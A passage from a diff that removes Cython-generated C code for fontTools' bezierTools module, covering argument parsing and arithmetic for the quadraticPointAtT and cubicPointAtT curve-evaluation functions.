__PYX_ERR(0, 1046, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_t = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 1046, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.quadraticPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_60quadraticPointAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_60quadraticPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_t) { - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_y = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("quadraticPointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1056 - * A 2D tuple with the coordinates of the point. - * """ - * x = (1 - t) * (1 - t) * pt1[0] + 2 * (1 - t) * t * pt2[0] + t * t * pt3[0] # <<<<<<<<<<<<<< - * y = (1 - t) * (1 - t) * pt1[1] + 2 * (1 - t) * t * pt2[1] + t * t * pt3[1] - * return (x, y) - */ - __pyx_t_1 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_t_2, 2, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t, __pyx_v_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt3, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1057 - * """ - * x = (1 - t) * (1 - t) * pt1[0] + 2 * (1 - t) * t * pt2[0] + t * t * pt3[0] - * y = (1 - t) * (1 - t) * pt1[1] + 2 * (1 - t) * t * pt2[1] + t * t * pt3[1] # <<<<<<<<<<<<<< - * return (x, y) - * - */ - __pyx_t_1 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_t_2, 2, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t, __pyx_v_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt3, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1058 - * x = (1 - t) * (1 - t) * pt1[0] + 2 * (1 - t) * t * pt2[0] + t * t * pt3[0] - * y = (1 - t) * (1 - t) * pt1[1] + 2 * (1 - t) * t * pt2[1] + t * t * pt3[1] - * return (x, y) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1058, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x)) __PYX_ERR(0, 1058, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y)) __PYX_ERR(0, 1058, __pyx_L1_error); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools.quadraticPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_y); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_63cubicPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_62cubicPointAtT, "cubicPointAtT(pt1, pt2, pt3, pt4, t)\nFinds the point at time `t` on a cubic curve.\n\n Args:\n pt1, pt2, pt3, pt4: Coordinates of the curve as 2D tuples.\n t: The time along the curve.\n\n Returns:\n A 2D tuple with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_63cubicPointAtT = {"cubicPointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_63cubicPointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_62cubicPointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_63cubicPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("cubicPointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 1); __PYX_ERR(0, 1061, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 2); __PYX_ERR(0, 1061, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 3); __PYX_ERR(0, 1061, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 4); __PYX_ERR(0, 1061, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "cubicPointAtT") < 0)) __PYX_ERR(0, 1061, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - __pyx_v_t = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 1061, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_62cubicPointAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_62cubicPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_t) { - PyObject *__pyx_v_t2 = NULL; - PyObject *__pyx_v__1_t = NULL; - PyObject *__pyx_v__1_t_2 = NULL; - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_y = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("cubicPointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1071 - * A 2D tuple with the coordinates of the point. - * """ - * t2 = t * t # <<<<<<<<<<<<<< - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_t, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1071, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_t2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1072 - * """ - * t2 = t * t - * _1_t = 1 - t # <<<<<<<<<<<<<< - * _1_t_2 = _1_t * _1_t - * x = ( - */ - __pyx_t_1 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1072, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v__1_t = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1073 - * t2 = t * t - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t # <<<<<<<<<<<<<< - * x = ( - * _1_t_2 * _1_t * pt1[0] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v__1_t, __pyx_v__1_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1073, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v__1_t_2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1075 - * _1_t_2 = _1_t * _1_t - * x = ( - * _1_t_2 * _1_t * pt1[0] # <<<<<<<<<<<<<< - * + 3 * (_1_t_2 * t * pt2[0] + _1_t * t2 * pt3[0]) - * + t2 * t * pt4[0] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v__1_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1075, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1075, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1075, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1076 - * x = ( - * _1_t_2 * _1_t * pt1[0] - * + 3 * (_1_t_2 * t * pt2[0] + _1_t * t2 * pt3[0]) # <<<<<<<<<<<<<< - * + t2 * t * pt4[0] - * ) - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_v__1_t, __pyx_v_t2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt3, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_t_2, 3, 0, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1077 - * _1_t_2 * _1_t * pt1[0] - * + 3 * (_1_t_2 * t * pt2[0] + _1_t * t2 * pt3[0]) - * + t2 * t * pt4[0] # <<<<<<<<<<<<<< - * ) - * y = ( - */ - __pyx_t_5 = PyNumber_Multiply(__pyx_v_t2, __pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt4, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_5, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - 